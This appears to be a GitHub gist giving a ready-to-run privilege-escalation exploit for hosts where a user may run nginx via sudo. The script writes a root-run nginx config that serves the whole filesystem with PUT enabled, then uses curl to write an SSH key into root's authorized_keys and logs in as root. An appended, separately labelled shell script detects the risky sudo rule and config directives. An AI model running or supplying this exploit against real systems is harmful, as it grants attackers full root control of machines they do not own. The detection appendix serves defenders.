@DylanGrl
Last active January 13, 2024 22:07
nginx privilege escalation - SUDO

Privilege Escalation - NGINX / SUDO

Condition - You must have sudo permission on nginx:

user@host:~$ sudo -l
Matching Defaults entries for user on host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User user may run the following commands on host:
    (ALL : ALL) NOPASSWD: /usr/sbin/nginx

From an existing interactive session, create the following exploit code:

echo "[+] Creating configuration..."
cat << EOF > /tmp/nginx_pwn.conf
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
        worker_connections 768;
}
http {
	server {
	        listen 1339;
	        root /;
	        autoindex on;
	        dav_methods PUT;
	}
}
EOF
echo "[+] Loading configuration..."
sudo nginx -c /tmp/nginx_pwn.conf
echo "[+] Generating SSH Key..."
ssh-keygen
echo "[+] Display SSH Private Key for copy..."
cat .ssh/id_rsa
echo "[+] Add key to root user..."
curl -X PUT localhost:1339/root/.ssh/authorized_keys -d "$(cat .ssh/id_rsa.pub)"
echo "[+] Use the SSH key to get access"

Then run the exploit:

./exploit.sh

Store the SSH Private Key then use it to connect to the host:

chmod 600 root_key
ssh -i root_key root@host
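
Detection check (an added example, not part of the original gist): the script below flags the two preconditions this technique depends on, a sudo rule granting nginx with no argument restriction and a config combining user root, root / and dav_methods PUT. The function names and sample inputs are constructed for illustration, and the matching is line-based rather than a full sudoers or nginx parser.

```shell
#!/bin/sh
# Added defensive example, not from the original gist. Line-based heuristics,
# not a full sudoers or nginx parser; names and samples are constructed.

# Reads `sudo -l` output on stdin. Succeeds if a rule grants an nginx binary
# with no argument list, which lets the caller supply -c <any file>.
sudo_nginx_unrestricted() {
    tr ',' '\n' | grep -Eq '(^|[[:space:]])/[^[:space:]]*/nginx[[:space:]]*$'
}

# Prints one finding per risky directive in config file $1.
# Returns 1 if anything was flagged, 0 if the file is clean.
audit_nginx_conf() {
    _rc=0
    _body=$(sed 's/#.*//' "$1")    # drop comments before matching
    if printf '%s\n' "$_body" | grep -Eq '^[[:space:]]*user[[:space:]]+root([[:space:]]|;)'; then
        echo "user root: worker processes run as root"; _rc=1
    fi
    if printf '%s\n' "$_body" | grep -Eq '^[[:space:]]*root[[:space:]]+/[[:space:]]*;'; then
        echo "root /: the whole filesystem is the document root"; _rc=1
    fi
    if printf '%s\n' "$_body" | grep -Eq '^[[:space:]]*dav_methods[[:space:]][^;]*PUT'; then
        echo "dav_methods PUT: HTTP clients can write files"; _rc=1
    fi
    return "$_rc"
}

# Constructed sample inputs modelled on the sudo listing and config above.
SAMPLE_SUDO_L='User user may run the following commands on host:
    (ALL : ALL) NOPASSWD: /usr/sbin/nginx'
SAMPLE_CONF=$(mktemp)
trap 'rm -f "$SAMPLE_CONF"' EXIT
printf 'user root;\nhttp {\n  server {\n    listen 1339;\n    root /;\n    dav_methods PUT;\n  }\n}\n' >"$SAMPLE_CONF"

if printf '%s\n' "$SAMPLE_SUDO_L" | sudo_nginx_unrestricted; then
    echo "sudoers: nginx granted without argument restriction"
fi
audit_nginx_conf "$SAMPLE_CONF" || echo "config: risky directives found"
```

A rule restricted to fixed arguments, such as /usr/sbin/nginx -s reload, is not flagged, because sudo then rejects any other argument list, including -c.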

Credit
